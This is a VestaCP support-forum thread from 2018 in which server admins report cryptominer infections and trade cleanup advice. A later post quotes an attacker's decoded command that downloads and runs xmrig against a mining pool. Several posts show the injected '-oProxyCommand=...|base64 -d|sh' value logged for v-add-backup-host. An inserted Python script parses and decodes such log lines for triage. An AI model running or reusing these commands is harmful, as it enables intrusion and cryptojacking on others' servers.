Page 4 of 5
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 1:39 pm
by sauvegardezvous99
ScIT wrote: Tue Jun 26, 2018 3:58 am
Can you send more information about the creation time of the files? The Vesta dev team has patched this issue with release 22; for further investigation we need to be sure that the infection happened after the upgrade to 22.
To answer your question, I was indeed on version 20.
Code:
[xxx@two /]# cd /usr/local/vesta/bin
[xxx@two bin]# ./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 x86_64 yes 2018-04-09
vesta-php 0.9.8 17 x86_64 yes 2016-11-26
vesta-nginx 0.9.8 17 x86_64 yes 2016-11-26
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 1:43 pm
by sauvegardezvous99
You're up to date, good so far. Now you need to clean your server. My point of view: do not trust an infected server anymore. Better to install a new one and migrate the users there.
As you said, I've shut down the hacked server and manually moved all users to another one.
No chances to take.
Thank you for all your great advice.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 10:04 pm
by deanhills
ScIT wrote: Tue Jun 26, 2018 3:58 am
Can you send more information about the creation time of the files? The Vesta dev team has patched this issue with release 22; for further investigation we need to be sure that the infection happened after the upgrade to 22.
I'm going to wait for the outcome of your research and am looking forward to the results before I do anything. My panel is on automatic upgrades; I'm sure most of the user panels are that way.
The only thing that worried me tonight was the dead.file in my file directory, and there was an IP from Korea trying to log in with SSH. I've since banned that IP with my Fail2Ban; hopefully there won't be more to follow.
Once I restarted VestaCP tonight everything was fine, and when I did research at UNIX about the dead.file it didn't look as though the issue belonged to VestaCP. I'm not sure about that though.
The only bad part was when I mentioned this to my VPS host: they were worried and immediately thought I was hacked because of this thread at VestaCP. I wasn't hacked.
We'd be grateful if the Admin of VestaCP could respond positively, so our VPS hosts can have peace of mind about our VestaCP installations. Thanks.
Re: have been HACKED ! by xaxaxa.eu
Posted: Thu Jun 28, 2018 7:02 pm
by ram108
Spheerys wrote: Tue Jun 26, 2018 7:21 am
Look at this file or a similar one: /etc/cron/d/php5
It calls another file: /usr/lib/php5/sessionclean
If you are sure of what you are doing, delete them both.
sessionclean is part of the php package and should not be removed.
Re: have been HACKED ! by xaxaxa.eu
Posted: Thu Jun 28, 2018 8:58 pm
by Spheerys
You are right! I will edit my post. Thanks!
Re: have been HACKED ! by xaxaxa.eu
Posted: Sat Jun 30, 2018 11:45 am
by tombabomba
I got hacked as well. 3 Vesta servers, only 2 of them got hacked.
Initially, I didn't know what was going on, so I removed execution permission from /tmp, and partially stopped it.
Later I found this forum and applied the updates.
Thanks Vesta team for your help and quick release of patch.
Re: have been HACKED ! by xaxaxa.eu
Posted: Mon Jul 02, 2018 10:26 am
by cybersa
My website was hacked on Jun 22 around 11:10 PM UTC. My server got upgraded to the latest version automatically, but I think the server was infected before that.
I have removed the miner file under /tmp/xmrig. Then I analyzed the server log to find the root cause and found the following:
1. No new user (sysroot), as mentioned in the first post's script, has been created.
2. No new cron jobs have been added.
3. xmrig was run with this cmd:
Code:
./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
4. Found this log in /var/log/vesta/error.log
Code:
2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
Decoded version:
Code:
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
My OS: Ubuntu 16
FYI
@ScIT
Re: have been HACKED ! by xaxaxa.eu
Posted: Wed Jul 18, 2018 8:29 pm
by semasping
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code:
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
Code:
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Re: have been HACKED ! by xaxaxa.eu
Posted: Thu Jul 19, 2018 6:52 am
by ScIT
semasping wrote: Wed Jul 18, 2018 8:29 pm
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code:
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
Code:
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Still the same question: was the infection before or after the update to release 22?
There was a security issue in the API, so it was possible to run API commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the safest way is to reinstall the server and migrate user data.
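An added triage helper for the indicator discussed in this thread (not code from the thread or from Vesta): it scans lines in the /var/log/vesta/error.log format quoted above for v-add-backup-host calls whose host argument carries an injected -oProxyCommand, and decodes the embedded base64 for inspection only, never executing it. The log lines, the base64 string and the function name are constructed assumptions; the line layout follows the entries posted above.

```python
import base64
import re

# Constructed sample in the /var/log/vesta/error.log format quoted in the thread.
# The base64 string is a harmless constructed placeholder, not the attacker's payload.
CONSTRUCTED_B64 = base64.b64encode(b"echo placeholder-payload").decode()
SAMPLE_LOG = (
    "2018-06-22 23:10:02 v-list-user 'admin' [Error 3]\n"
    "2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' "
    f"'\"-oProxyCommand=echo {CONSTRUCTED_B64}|base64 -d|sh\" x' '******' [Error 15]\n"
    "2018-06-23 04:01:01 v-add-backup-host 'sftp' 'backup.example.net' 'backupuser' '******' [Error 15]\n"
)

# <timestamp> <v-command> <args...> [Error N]   (the error suffix is optional)
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<cmd>v-[\w-]+) "
    r"(?P<args>.*?)(?: \[Error (?P<code>\d+)\])?$"
)
# A backup host argument that starts with an SSH "-o" option instead of a hostname
# is the injection indicator discussed in the thread.
PROXY_RE = re.compile(r"-o\s*ProxyCommand=(?P<proxy>[^\"']*)", re.IGNORECASE)
B64_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)")


def triage_vesta_log(text):
    """One finding per v-add-backup-host call carrying an injected ProxyCommand."""
    # The embedded base64 is decoded only for inspection; nothing is executed.
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"] != "v-add-backup-host":
            continue
        pm = PROXY_RE.search(m["args"])
        if not pm:
            continue
        finding = {"ts": m["ts"], "error": m["code"], "proxy_command": pm["proxy"].strip(), "decoded": None}
        bm = B64_RE.search(pm["proxy"])
        if bm:
            try:
                finding["decoded"] = base64.b64decode(bm.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                pass  # not valid base64; keep the raw ProxyCommand for manual review
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage_vesta_log(SAMPLE_LOG):
        print(f"{f['ts']} injected ProxyCommand -> {f['decoded'] or f['proxy_command']!r}")
```

Point it at a copy of the real error.log to list every such call with its timestamp, which answers the "before or after release 22" question per host.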
Re: have been HACKED ! by xaxaxa.eu
Posted: Fri Jul 20, 2018 10:40 am
by semasping
ScIT wrote: Thu Jul 19, 2018 6:52 am
semasping wrote: Wed Jul 18, 2018 8:29 pm
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code:
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
Code:
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Still the same question: was the infection before or after the update to release 22?
There was a security issue in the API, so it was possible to run API commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the safest way is to reinstall the server and migrate user data.
The system was infected before the update.